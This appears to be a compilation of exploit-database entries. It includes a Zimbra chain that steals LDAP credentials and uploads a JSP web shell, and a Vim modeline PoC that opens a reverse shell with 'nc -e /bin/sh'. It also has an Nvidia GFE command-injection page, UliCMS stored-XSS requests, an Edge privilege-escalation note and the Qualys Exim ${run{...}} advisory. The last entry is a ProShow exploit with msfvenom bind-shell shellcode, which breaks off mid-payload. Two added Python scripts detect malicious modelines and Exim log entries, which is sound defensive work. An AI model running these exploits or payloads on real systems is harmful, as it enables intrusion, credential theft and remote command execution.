
#coding=utf8
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
base_url=sys.argv[1]
base_url=base_url.rstrip("/")
#upload file name and content
#modify by k8gege
#Connect "shell.jsp" using K8fly CmdShell
#Because the CMD parameter is encrypted using Base64(bypass WAF)
filename = "shell.jsp"
fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>'
print(base_url)
#dtd file url
dtd_url="https://k8gege.github.io/zimbra.dtd"
"""
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
"""
xxe_data = r"""<!DOCTYPE Autodiscover [
        <!ENTITY % dtd SYSTEM "{dtd}">
        %dtd;
        %all;
        ]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
    </Request>
</Autodiscover>""".format(dtd=dtd_url)

#XXE stage
headers = {
    "Content-Type":"application/xml"
}
print("[*] Get User Name/Password By XXE ")
r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15)
#print r.text
if 'response schema not available' not in r.text:
    print("have no xxe")
    exit()

#low_token Stage
import re
pattern_name = re.compile(r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>")
pattern_password = re.compile(r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>")
username = pattern_name.findall(r.text)[0][2]
password = pattern_password.findall(r.text)[0][2]
print(username)
print(password)

auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="{xmlns}">
        <account by="adminName">{username}</account>
        <password>{password}</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>
"""
print("[*] Get Low Privilege Auth Token")
r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False)

pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>")

low_priv_token = pattern_auth_token.findall(r.text)[0]

#print(low_priv_token)

# SSRF+Get Admin_Token Stage

headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";"
headers["Host"]="foo:7071"
print("[*] Get Admin  Auth Token By SSRF")
r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False)

admin_token =pattern_auth_token.findall(r.text)[0]
#print("ADMIN_TOKEN:"+admin_token)

f = {
    'filename1':(None,"whocare",None),
    'clientFile':(filename,fileContent,"text/plain"),
    'requestId':(None,"12",None),
}

headers ={
    "Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";"
}
print("[*] Uploading file")
r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)
#print(r.text)
print("Shell: "+base_url+"/downloads/"+filename)
#print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)")
print("[*] Request Result:")
s = requests.session()
r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers)
#print(r.text)
print("May need cookie:")
print(headers['Cookie'])
            
*by Arminius ([@rawsec](https://twitter.com/rawsec))*

Vim/Neovim Arbitrary Code Execution via Modelines
=================================================

```
Product: Vim < 8.1.1365, Neovim < 0.3.6
Type:    Arbitrary Code Execution
CVE:     CVE-2019-12735
Date:    2019-06-04
Author:  Arminius (@rawsec)
```

Summary
-------

Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code
execution via modelines by opening a specially crafted text file.


Proof of concept
----------------

- Create [`poc.txt`](../data/2019-06-04_ace-vim-neovim/poc.txt):

      :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

- Ensure that the modeline option has not been disabled (`:set modeline`).

- Open the file in Vim:

      $ vim poc.txt

- The system will execute `uname -a`.

Proof of concept 2 (reverse shell)
----------------------------------

This PoC outlines a real-life attack approach in which a reverse shell
is launched once the user opens the file. To conceal the attack, the file will
be immediately rewritten when opened. Also, the PoC uses terminal escape
sequences to hide the modeline when the content is printed with `cat`. (`cat
-v` reveals the actual content.)

[`shell.txt`](../data/2019-06-04_ace-vim-neovim/shell.txt):

    \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

Demo (victim left, attacker right):

![Reverse shell demo](https://i.imgur.com/8w4tteX.gif)

Details
-------

The modeline feature allows specifying custom editor options near the start or
end of a file. This feature is enabled by default and applied to all file types,
including plain `.txt`. A typical modeline:

    /* vim: set textwidth=80 tabstop=8: */

For security reasons, only a subset of options is permitted in modelines, and
if the option value contains an expression, it is executed in a sandbox: [[1]]

    No other commands than "set" are supported, for security reasons (somebody
    might create a Trojan horse text file with modelines).  And not all options
    can be set.  For some options a flag is set, so that when it's used the
    |sandbox| is effective.

The sandbox is meant to prevent side effects: [[2]]

    The 'foldexpr', 'formatexpr', 'includeexpr', 'indentexpr', 'statusline' and
    'foldtext' options may be evaluated in a sandbox.  This means that you are
    protected from these expressions having nasty side effects.  This gives some
    safety for when these options are set from a modeline.

However, the `:source!` command (with the bang [`!`] modifier) can be used to
bypass the sandbox. It reads and executes commands from a given file as if
*typed manually*, running them after the sandbox has been left. [[3]]

    :so[urce]! {file}       Read Vim commands from {file}.  These are commands
                            that are executed from Normal mode, like you type
                            them.

Thus, one can trivially construct a modeline that runs code outside the sandbox:

    # vim: set foldexpr=execute('\:source! some_file'):

An additional step is needed for Neovim which blacklists `execute()`: [[4]]

    execute({command} [, {silent}])                         *execute()*
                    Execute {command} and capture its output.
                    [...]
                    This function is not available in the |sandbox|.

Here, `assert_fails()` can be used instead, which takes a `{cmd}` argument, too: [[5]]

    assert_fails({cmd} [, {error} [, {msg}]])               *assert_fails()*
                    Run {cmd} and add an error message to |v:errors| if it does
                    NOT produce an error.

The following modeline utilizes a fold expression to run `source!  %` to
execute the current file, which in turn executes `uname -a || "(garbage)"` as a
shell command:

    :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Additionally, the Neovim-only function `nvim_input()` is vulnerable to the same
approach via e.g.:

     vi:fen:fdm=expr:fde=nvim_input("\:terminal\ uname\ -a"):fdl=0

(In the past, other modeline-related vulnerabilities have been patched in Vim - see [CVE-2002-1377](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1377), [CVE-2016-1248](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248).)

Patches
-------

- [Vim patch 8.1.1365](https://github.com/vim/vim/commit/5357552)
- [Neovim patch](https://github.com/neovim/neovim/pull/10082) (released in [v0.3.6](https://github.com/neovim/neovim/releases/tag/v0.3.6))

Beyond patching, it's recommended to disable modelines in the vimrc (`set
nomodeline`), to use the [securemodelines](https://github.com/ciaranm/securemodelines/)
plugin, or to disable `modelineexpr` (since patch 8.1.1366, Vim-only) to disallow
expressions in modelines.
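The advisory above lists which options are expression-valued (and therefore evaluated when a modeline sets them) and which commands and functions act outside the sandbox. The following Python script is an added detection example, not part of the advisory and not Vim's own modeline parser: it inspects the first and last five lines of a file (the lines Vim's `modelines` setting covers), parses both modeline forms with a simplified grammar, flags any modeline that sets one of the sandboxed expression options, escalates when that expression references `source`, `execute()`, `assert_fails()`, `nvim_input()` or `system()`, and separately flags ESC bytes of the kind the reverse-shell PoC uses to hide its modeline from `cat`. The option list and escape markers are taken from the text above; the samples are constructed from the PoC strings rather than read from the advisory's files.

```python
import re

# Options that the Vim documentation quoted above says "may be evaluated in a
# sandbox" when set from a modeline, with their short names (assumed complete
# for this example; the authoritative list is Vim's options.txt).
EXPR_OPTIONS = {
    "foldexpr": "fde", "formatexpr": "fex", "includeexpr": "inex",
    "indentexpr": "inde", "statusline": "stl", "foldtext": "fdt",
}
EXPR_OPTION_NAMES = set(EXPR_OPTIONS) | set(EXPR_OPTIONS.values())

# Commands/functions the advisory names as ways to act outside the sandbox.
ESCAPE_MARKERS = ("source", "execute(", "assert_fails(", "nvim_input(", "system(")

# Simplified modeline grammar: "[text ]vi:|vim:|Vim:|ex:[ ]{options}" where the
# options are separated by ':' or whitespace, or the "set {options}:" form where
# they are separated by whitespace only. A backslash escapes a separator.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex):\s*(.*)$")
SET_FORM_RE = re.compile(r"se(?:t)?\s+(.*?)(?<!\\):")
SPLIT_FIRST_FORM = re.compile(r"(?<!\\)[\s:]+")
SPLIT_SET_FORM = re.compile(r"(?<!\\)\s+")


def parse_modeline(line):
    """Return [(option, value-or-None), ...] for a modeline, or None if absent."""
    m = MODELINE_RE.search(line)
    if not m:
        return None
    body = m.group(1)
    set_form = SET_FORM_RE.match(body)
    if set_form:
        tokens = SPLIT_SET_FORM.split(set_form.group(1))
    else:
        tokens = SPLIT_FIRST_FORM.split(body)
    pairs = []
    for tok in tokens:
        if tok:
            name, eq, value = tok.partition("=")
            pairs.append((name, value if eq else None))
    return pairs


def modeline_candidates(text, modelines=5):
    """The lines Vim inspects: the first and last 'modelines' lines (default 5)."""
    lines = text.splitlines()
    n = len(lines)
    idx = set(range(min(modelines, n))) | set(range(max(0, n - modelines), n))
    return [(i + 1, lines[i]) for i in sorted(idx)]


def assess(text):
    """Return (line_number, kind, detail) findings for a file's text.

    kind is 'terminal-escape' (an ESC byte is present, so the line can render
    differently from its content), 'modeline-expr' (a sandboxed expression
    option is set from a modeline) or 'sandbox-escape' (that expression also
    references one of the escape markers)."""
    findings = []
    for lineno, line in modeline_candidates(text):
        if "\x1b" in line:
            findings.append((lineno, "terminal-escape", "ESC byte in line; compare with cat -v"))
        pairs = parse_modeline(line)
        if not pairs:
            continue
        for opt, val in pairs:
            if opt in EXPR_OPTION_NAMES and val is not None:
                kind = "sandbox-escape" if any(s in val for s in ESCAPE_MARKERS) else "modeline-expr"
                findings.append((lineno, kind, f"{opt}={val}"))
    return findings


# Constructed samples built from the advisory's PoC strings (not its files).
SAMPLE_BENIGN = "/* vim: set textwidth=80 tabstop=8: */\nint main(void) { return 0; }\n"
SAMPLE_POC = r':!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="' + "\n"
SAMPLE_NVIM = r' vi:fen:fdm=expr:fde=nvim_input("\:terminal\ uname\ -a"):fdl=0' + "\n"
SAMPLE_HIDDEN = "\x1b[KNothing here. vim: set fen fdm=expr fde=assert_fails('set\\ fde=x') fdl=0:\n"

if __name__ == "__main__":
    for name, sample in [("benign", SAMPLE_BENIGN), ("poc", SAMPLE_POC),
                         ("nvim", SAMPLE_NVIM), ("hidden", SAMPLE_HIDDEN)]:
        print(name, assess(sample) or "clean")
```

Run it over a directory of text files before they are opened in an editor with modelines enabled, or wire `assess()` into a mail or download scanner; a `modeline-expr` finding on a file that has no reason to carry fold or indent expressions is worth a look even when none of the escape markers is present, since the marker list only covers the functions the advisory discusses.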

Timeline
--------

    - 2019-05-22 Vim and Neovim maintainers notified
    - 2019-05-23 Vim patch released
    - 2019-05-29 Neovim patch released
    - 2019-06-05 CVE ID CVE-2019-12735 assigned

Also see description of [CVE-2019-12735](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735).

[1]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/options.txt#L582
[2]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/eval.txt#L13050
[3]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/repeat.txt#L182
[4]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L3247
[5]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L2494
[6]: https://github.com/vim/vim/releases/tag/v8.1.1365
[7]: https://github.com/neovim/neovim/releases/tag/v0.3.6
            
<!-- 
POC for CVE‑2019‑5678 Nvidia GeForce Experience OS command injection via a web browser
Author: David Yesland -- Rhino Security Labs
 -->
<html>
   <head>
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
   </head>
   <body>
      <script>
         //Send request to local GFE server
          function submitRequest(port,secret)
          {
           var xhr = new XMLHttpRequest();
           xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true);
           xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
           xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
           xhr.setRequestHeader("Content-Type", "text\/html");
          xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret);
           var body = "\""+document.getElementById("cmd").value+"\"";
          var aBody = new Uint8Array(body.length);
           for (var i = 0; i < aBody.length; i++)
             aBody[i] = body.charCodeAt(i); 
           xhr.send(new Blob([aBody]));
          }
          
          $(document).on('change', '.file-upload-button', function(event) {
          var reader = new FileReader();
          
          reader.onload = function(event) {
          var jsonObj = JSON.parse(event.target.result);
          submitRequest(jsonObj.port,jsonObj.secret);
          }
          
          reader.readAsText(event.target.files[0]);
          });
          
          //Copy text from some text field
          function myFunction() {
          var copyText = document.getElementById("myInput");
          copyText.select();
          document.execCommand("copy");
          
          }
          
          //trigger the copy and file window on ctrl press
          $(document).keydown(function(keyPressed) {
          if (keyPressed.keyCode == 17) {
          myFunction();document.getElementById('file-input').click();
          }
          });
      </script>
      <h2>
         Press CTRL+V+Enter
      </h2>
      <!--Command to run in a hidden input field-->
      <input type="hidden" value="calc.exe" id="cmd" size="55">
      <!--Hidden text box to copy text from-->
      <div style="opacity: 0.0;">
         <input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json"
            id="myInput" size="1">
      </div>
      <!--file input-->
      <input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" />
   </body>
</html>
            
# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Date: 2019-05-12
# Exploit Author: Unk9vvN
# Vendor Homepage: https://en.ulicms.de
# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
# Version: 2019.1
# Tested on: Kali Linux
# CVE : CVE-2019-11398


# Description
# This vulnerability requires an authenticated session and is located in the CMS management panel. It is a stored XSS, and the vulnerable parameters are as follows.

# Vuln One
# URI: POST /ulicms/admin/index.php?action=languages
# Parameter: name="><script>alert('UNK9VVN')</script>

# Vuln Two
# URI: POST /ulicms/admin/index.php?action=pages_edit&page=23
# Parameter: systemname="><script>alert('UNK9VVN')</script>


#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E


#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 904
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
DNT: 1

csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content=


# Discovered by:
t.me/Unk9vvN
            
CVE-2019-0841 BYPASS #2

There is a second bypass for CVE-2019-0841.

This can be triggered as following:

Delete all files and subfolders within "c:\users\%username%\appdata\local\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\" (at least the ones we can delete as user)

Try to launch edge. It will crash the first time.

When we launch it a second time, it will write the DACL while impersonating "SYSTEM".

The trick here is to launch edge by clicking it on the taskbar or desktop, using "start microsoft-edge:" seems to result in correct impersonation.

You can still do this completely programmatically.. since edge will always be in the same position in the task bar.. *cough* sendinput *cough*. There are probably other ways too.

Another note, this bug is most definitely not restricted to edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes. I think it will also trigger by just launching edge once, but sometimes you may have to wait a little. I didn't do extensive testing.. found this bug and quickly wrote up a poc, took me like 2 hours total, finding LPEs is easy.

To repro:
1. Launch my poc
2. Launch edge several times

Use video demo as guidance. Also, I don't get paid for dropping bugs, so if you want a simple and full exploit, then go fucking write it yourself, I have better things to do, such as preparing my voyage into the arctic. You're welcome.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Make sure you have multiple cores in your VM (not multiple processors, multiple cores).

It's going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes it means you either have 1 core or set your vm to have multiple processors instead of multiple cores... which will also cause it to lock up.




EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46976.zip
            
Qualys Security Advisory

The Return of the WIZard: RCE in Exim (CVE-2019-10149)


========================================================================
Contents
========================================================================

Summary
Local exploitation
Remote exploitation
- Non-default configurations
- Default configuration
Acknowledgments
Timeline

    Boromir: "What is this new devilry?"
    Gandalf: "A Balrog. A demon of the Ancient World."
        -- The Lord of the Rings: The Fellowship of the Ring


========================================================================
Summary
========================================================================

During a code review of the latest changes in the Exim mail server
(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability
in versions 4.87 to 4.91 (inclusive). In this particular case, RCE means
Remote *Command* Execution, not Remote Code Execution: an attacker can
execute arbitrary commands with execv(), as root; no memory corruption
or ROP (Return-Oriented Programming) is involved.

This vulnerability is exploitable instantly by a local attacker (and by
a remote attacker in certain non-default configurations). To remotely
exploit this vulnerability in the default configuration, an attacker
must keep a connection to the vulnerable server open for 7 days (by
transmitting one byte every few minutes). However, because of the
extreme complexity of Exim's code, we cannot guarantee that this
exploitation method is unique; faster methods may exist.

Exim is vulnerable by default since version 4.87 (released on April 6,
2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and
older versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled
manually. Surprisingly, this vulnerability was fixed in version 4.92
(released on February 10, 2019):

https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...
https://bugs.exim.org/show_bug.cgi?id=2310

but was not identified as a security vulnerability, and most operating
systems are therefore affected. For example, we exploit an up-to-date
Debian distribution (9.9) in this advisory.


========================================================================
Local exploitation
========================================================================

The vulnerable code is located in deliver_message():

6122 #ifndef DISABLE_EVENT
6123       if (process_recipients != RECIP_ACCEPT)
6124         {
6125         uschar * save_local =  deliver_localpart;
6126         const uschar * save_domain = deliver_domain;
6127
6128         deliver_localpart = expand_string(
6129                       string_sprintf("${local_part:%s}", new->address));
6130         deliver_domain =    expand_string(
6131                       string_sprintf("${domain:%s}", new->address));
6132
6133         (void) event_raise(event_action,
6134                       US"msg:fail:internal", new->message);
6135
6136         deliver_localpart = save_local;
6137         deliver_domain =    save_domain;
6138         }
6139 #endif

Because expand_string() recognizes the "${run{<command> <args>}}"
expansion item, and because new->address is the recipient of the mail
that is being delivered, a local attacker can simply send a mail to
"${run{...}}@localhost" (where "localhost" is one of Exim's
local_domains) and execute arbitrary commands, as root
(deliver_drop_privilege is false, by default):

[...]


========================================================================
Remote exploitation
========================================================================

Our local-exploitation method does not work remotely, because the
"verify = recipient" ACL (Access-Control List) in Exim's default
configuration requires the local part of the recipient's address (the
part that precedes the @ sign) to be the name of a local user:

[...]

------------------------------------------------------------------------
Non-default configurations
------------------------------------------------------------------------

We eventually devised an elaborate method for exploiting Exim remotely
in its default configuration, but we first identified various
non-default configurations that are easy to exploit remotely:

- If the "verify = recipient" ACL was removed manually by an
  administrator (maybe to prevent username enumeration via RCPT TO),
  then our local-exploitation method also works remotely.

- If Exim was configured to recognize tags in the local part of the
  recipient's address (via "local_part_suffix = +* : -*" for example),
  then a remote attacker can simply reuse our local-exploitation method
  with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the
  name of a local user).

- If Exim was configured to relay mail to a remote domain, as a
  secondary MX (Mail eXchange), then a remote attacker can simply reuse
  our local-exploitation method with an RCPT TO "${run{...}}@khazad.dum"
  (where "khazad.dum" is one of Exim's relay_to_domains). Indeed, the
  "verify = recipient" ACL can only check the domain part of a remote
  address (the part that follows the @ sign), not the local part.
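The local-exploitation section explains why the recipient address matters (it is handed to expand_string() unchanged, and "${run{...}}" is a recognised expansion item), and the three bullets above explain which non-default ACL settings let a remote recipient reach that code. The following Python is an added example, written for this page and not taken from Exim or from Qualys: it models the default "verify = recipient" rule as the advisory describes it (local part must be a local user; suffix stripping and relay domains weaken the check), shows which of the advisory's example addresses pass under which configuration, and scans a constructed mainlog excerpt for accepted or rejected addresses whose local part contains an expansion item. The domain, user and log data are assumed values for the model; the log format assumes `log_selector` includes `+received_recipients` so that accepted messages record their recipients after "for".

```python
import re

# Constructed configuration for the model (assumed values; not from the advisory).
LOCAL_DOMAINS = {"localhost"}
RELAY_TO_DOMAINS = {"khazad.dum"}      # secondary-MX setup from the third bullet above
LOCAL_USERS = {"balrog", "gandalf"}    # local accounts; "balrog" is the advisory's example user

# An Exim expansion item starts with "${"; "${run{...}}" is the one the advisory uses.
EXPANSION_ITEM = re.compile(r"\$\{")


def recipient_verifies(address, local_part_suffix=False):
    """Simplified model of the default "verify = recipient" ACL as described above.

    Local domain: the local part must be the name of a local user. With the
    non-default "local_part_suffix = +* : -*" the "+tag"/"-tag" suffix is stripped
    before the lookup, so only the prefix is checked. Relay domain (secondary MX):
    only the domain is checked and the local part is not verified at all.
    """
    local_part, sep, domain = address.rpartition("@")
    if not sep:
        return False
    if domain in RELAY_TO_DOMAINS:
        return True
    if domain not in LOCAL_DOMAINS:
        return False
    if local_part_suffix:
        local_part = re.split(r"[+-]", local_part, maxsplit=1)[0]
    return local_part in LOCAL_USERS


def accepted_with_expansion_item(address, local_part_suffix=False):
    """True when the address is accepted by the ACL *and* still carries an
    expansion item in its local part: the combination the advisory's
    non-default-configuration bullets rely on."""
    local_part, _, _ = address.rpartition("@")
    return recipient_verifies(address, local_part_suffix) and bool(EXPANSION_ITEM.search(local_part))


# Detection side: addresses in Exim's mainlog whose local part contains "${".
EXPANSION_ADDRESS = re.compile(r"([^\s<>]*\$\{[^\s<>]*)@([^\s<>:]+)")

# Constructed mainlog excerpt (assumes log_selector includes +received_recipients
# so that accepted messages log their recipients after "for").
SAMPLE_MAINLOG = """\
2019-06-05 10:00:01 1hYABC-000123-4X <= alice@example.org H=mail.example.org [192.0.2.10] P=esmtp S=1234 for gandalf@localhost
2019-06-05 10:00:02 1hYABC-000124-5Y <= root@localhost U=root P=local S=999 for balrog@localhost
2019-06-05 10:00:03 1hYABC-000125-6Z <= mallory@example.net H=(x) [198.51.100.7] P=esmtp S=456 for balrog+${run{...}}@localhost
2019-06-05 10:00:04 H=(x) [198.51.100.7] F=<mallory@example.net> rejected RCPT <${run{...}}@localhost>: Unrouteable address
"""


def expansion_items_in_log(log_text):
    """Return (line_number, local_part, domain) for each logged address whose
    local part contains an expansion item, whether the message was accepted or rejected."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for m in EXPANSION_ADDRESS.finditer(line):
            hits.append((lineno, m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    for addr, suffix in [("balrog@localhost", False),
                         ("${run{...}}@localhost", False),
                         ("balrog+${run{...}}@localhost", False),
                         ("balrog+${run{...}}@localhost", True),
                         ("${run{...}}@khazad.dum", False)]:
        print(f"{addr:32} suffix={suffix!s:5} accepted={recipient_verifies(addr, suffix)!s:5} "
              f"reaches_expansion={accepted_with_expansion_item(addr, suffix)}")
    for hit in expansion_items_in_log(SAMPLE_MAINLOG):
        print("mainlog line %d: local part %r for domain %s" % hit)
```

The model shows why the default configuration resists the simple method (an address that is itself an expansion item is not a local user) and why each of the three configuration changes above reopens it; the log scanner gives a cheap retrospective check on hosts that ran 4.87 to 4.91, with a rejected-RCPT hit indicating an attempt and an accepted-message hit indicating a message that reached the vulnerable delivery path.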

------------------------------------------------------------------------
Default configuration
------------------------------------------------------------------------

[...]


========================================================================
Acknowledgments
========================================================================

We thank Exim's developers, Solar Designer, and the members of
distros@openwall.

"The Return of the WIZard" is a reference to Sendmail's ancient WIZ and
DEBUG vulnerabilities:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145
https://seclists.org/bugtraq/1995/Feb/56

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095
http://www.cheswick.com/ches/papers/berferd.pdf


========================================================================
Timeline
========================================================================

2019-05-27: Advisory sent to security@exim.

2019-05-28: Advisory sent to distros@openwall.
            
#!/usr/bin/python
# _*_ coding:utf-8 _*_

# Exploit Title: ProShow v9.0.3797 Local Exploit
# Exploit Author: @Yonatan_Correa
# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
# Vendor Homepage: http://www.photodex.com/ProShow
# Software Link: http://files.photodex.com/release/pspro_90_3797.exe
# Version: v9.0.3797
# Tested on: Wind 7

from struct import pack

informacion = """

	ProShow v9.0.3797
	http://www.photodex.com/ProShow


	execute exploit
	create a file called "load"
	copy load "C:\Program Files\Photodex\ProShow Producer\"
	"C:\Program Files\Photodex\ProShow Producer\proshow.exe"
	And connect nc -nv IP_Host 4444

	Testing: Windows 7
	@Yonatan_Correa
	https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
"""


# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c
# Payload size: 717 bytes
shell = "yonayona" + ("\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59"
"\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e"
"\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52"
"\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e"
"\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51"
